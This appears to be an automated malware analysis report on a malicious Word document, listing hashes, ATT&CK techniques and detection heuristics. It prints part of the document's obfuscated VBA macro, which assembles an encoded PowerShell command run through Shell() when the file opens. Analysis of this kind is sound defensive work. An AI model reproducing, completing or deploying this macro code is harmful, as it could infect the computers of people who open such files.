Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bb53a0dbd517be2d…

MALICIOUS

Office (OLE)

225.0 KB Created: 2018-06-28 08:03:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: 6ebde09ff39b61d06a5cc40265ebf574 SHA-1: d8398f144a623c2c246f11c800b10e6f1eef351b SHA-256: bb53a0dbd517be2d3d3d3fc2e219949ca4e12e40b9f1f45181660df2ba7ec6b3
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a Microsoft Office document containing a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening. The macro utilizes a Shell() call, indicating an intent to execute external commands or payloads. ClamAV also detected this file as malware (Doc.Malware.Valyria-6701776-0), further supporting its malicious nature. The obfuscated script makes it difficult to determine the exact payload, but the presence of AutoOpen and Shell() strongly suggests a downloader or dropper functionality.

Heuristics 7

  • ClamAV: Doc.Malware.Valyria-6701776-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6701776-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13567 bytes
SHA-256: 290756a11563188c0d961f2b34ebafcc6c7236fd6ebe936c6af4dbcad415e6fc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "JmlAvBh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "tutUpVZkatv"
Function MkYjDlj()
On Error Resume Next
JwfKL = ChrB(31857 + _
Sin(SJJWFF * CLng(NjmZna + 20762) _
 + 59354 _
+ MdqcKl))
iRnmiw _
= 20278 + Atn(46524) / 87563 / _
Round(88710) / 91833 / CInt(RJTMpJ)
wUpDuGmIm = "HELL" + "    " + "         " + "     " + "       " + "       " + "        " + " " + Chr(40) + "[cHaR"
DcjmB = ChrB(65910 + _
Sin(iQTjVo * CLng(hJaUSG + 20633) _
 + 43565 _
+ fzRjii))
iBnzf _
= 81666 + Atn(98854) / 12720 / _
Round(53111) / 42833 / CInt(fAOXop)
PuUFuu = "[]] " + Chr(40) + "61 ," + " 90 ,79 ," + " 106, 36," + " 119 " + ",124, 11" + "0, 52" + ",118,12" + "3, 115 " + ",124 "
NzroCV = ChrB(66961 + _
Sin(hvBpkw * CLng(AwdqV + 27744) _
 + 43665 _
+ piVNA))
ppAaG _
= 16421 + Atn(37690) / 92393 / _
Round(99118) / 9521 / CInt(BZjZG)
Tjnwvw = ",122" + " , 109" + ", 57 ," + " 87 , 124" + ",109" + ", 55 ,78" + ",124, 12"
OGsAb = ChrB(4936 + _
Sin(lTrYBJ * CLng(Hihkuv + 95677) _
 + 2105 _
+ jNTrWD))
zAFrj _
= 42177 + Atn(63271) / 74847 / _
Round(59149) / 74347 / CInt(RiYNS)
jUwatJZWZ = "3, 90 ," + "117, 1" + "12,124, 1" + "19 , 10" + "9 , 3" + "4 ,61" + ", 72 , 1" + "22 , 92"
MjBoT = ChrB(44038 + _
Sin(NiMnH * CLng(MhntM + 57613) _
 + 72429 _
+ AaZOvY))
zLXXGH _
= 14607 + Atn(16280) / 41949 / _
Round(96972) / 43874 / CInt(QiIlV)
GwMWI = " , 36 " + ", 62,11" + "3 , 109,1" + "09 ,10" + "5,106," + " 35,54"
nKYcl = ChrB(91422 + _
Sin(jiLIb * CLng(XwRcjn + 22689) _
 + 18842 _
+ BNJkU))
kzYbwl _
= 19992 + Atn(38977) / 58489 / _
Round(17423) / 85646 / CInt(OsdvU)
lmLSWcoCE = " ,54 ,120" + " ,111, " + "124 ,107" + ", 11" + "2, 119 " + ", 55 , 1" + "05 ," + "107, " + "118,54 " + ", 82, 94" + ",67 , "
UCzPwH = ChrB(17366 + _
Sin(NILSA * CLng(iMwodX + 49858) _
 + 29011 _
+ zUTKrv))
WiXfEA _
= 16589 + Atn(26882) / 35866 / _
Round(16483) / 24224 / CInt(UOHwLC)
zIpjQpB = "87,45" + ", 10" + "9,83,1" + "20 ,7" + "4 ,54,89" + ", 113" + " , 1" + "09 , 1" + "09 ," + "105 , 35" + ",54 ," + "54 , 110"
qBKKi = ChrB(60036 + _
Sin(FSwvc * CLng(RIuFJM + 98128) _
 + 53820 _
+ mdNFb))
DBGBz _
= 52053 + Atn(49839) / 36375 / _
Round(51860) / 45302 / CInt(wvEHpL)
VCiENjbb = ",110" + " , 11" + "0, 55, 1" + "22,11" + "1 , 1" + "12 , 125," + "124 "
dnAzzd = ChrB(24626 + _
Sin(nOhzd * CLng(flmGQ + 40279) _
 + 76523 _
+ PnNqk))
TfriHJ _
= 2623 + Atn(87726) / 14583 / _
Round(85776) / 36312 / CInt(stIbXw)
fszJfERUW = ", 120" + ", 112" + ",119," + " 109, 124" + ",107" + ",112 ,118" + ",107,55" + ",122 ,11" + "8 ,116" + ", 54 , 82" + ", 78 , "
pYNHWV = ChrB(14340 + _
Sin(mNYNlG * CLng(GrsEci + 96285) _
 + 10199 _
+ SGLOZE))
iuKFP _
= 59655 + Atn(96151) / 80813 / _
Round(37338) / 61854 / CInt(BvjOiZ)
wJzHjGTjXAN = "74 , " + "116 ,74," + "93 ,1" + "25 , " + "116," + "109," + " 54, " + "89,11"
MkYjDlj = wUpDuGmIm + PuUFuu + Tjnwvw + jUwatJZWZ + GwMWI + lmLSWcoCE + zIpjQpB + VCiENjbb + fszJfERUW + wJzHjGTjXAN
osVaz = ChrB(25182 + _
Sin(SYpPJs * CLng(iLnzT + 10326) _
 + 62241 _
+ QUOiw))
kNRBM _
= 85068 + Atn(51279) / 46120 / _
Round(79326) / 96198 / CInt(skRGun)
End Function
Function JoSPEbc()
On Error Resume Next
VXMMY _
= 11857 + Atn(71972) / 22664 / _
Round(62515) / 18925 / CInt(EJtTl)
fFiJY = ChrB(57021 + _
Sin(aicZb * CLng(LTQlz + 2170) _
 + 55680 _
+ lmRWf))
QrWllkq = "3, 109 " + ", 109 " + ",105,35," + " 54," + "54 , " + "110 ,110" + ",110 , 5" + "5,119 , 1" + "24 , 110" + ",55 , 10" + "5 ,112, 1" + "26,116"
kOvmuf _
= 23924 + Atn(67748) / 47598 / _
Round(26206) / 92636 / CInt(tFlpdL)
jwwoXv = ChrB(35469 + _
Sin(FuTQm * CLng(zWLmpi + 93742) _
 + 76830 _
+ uDpBHX))
DfuPbuVSdNi = " ,124 ,1" + "19 ,1" + "09,118" + " ,120,9" + "9 ,10" + "8,117 , 5" + "5 , 1"
vIGmz _
= 61748 + Atn(76557) / 51596 / _
Round(46968) / 83667 / CInt(WHpFw
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.